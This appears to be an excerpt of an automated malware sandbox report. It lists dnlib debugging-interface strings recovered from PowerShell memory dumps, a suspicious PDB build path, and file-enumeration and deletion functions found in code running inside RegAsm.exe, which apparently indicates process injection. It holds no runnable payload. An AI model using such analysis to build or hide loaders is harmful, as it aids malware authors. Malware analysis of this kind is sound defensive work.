                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407877 FindFirstFileW,FindNextFileW,9_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044E8F9 FindFirstFileExA,9_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD72
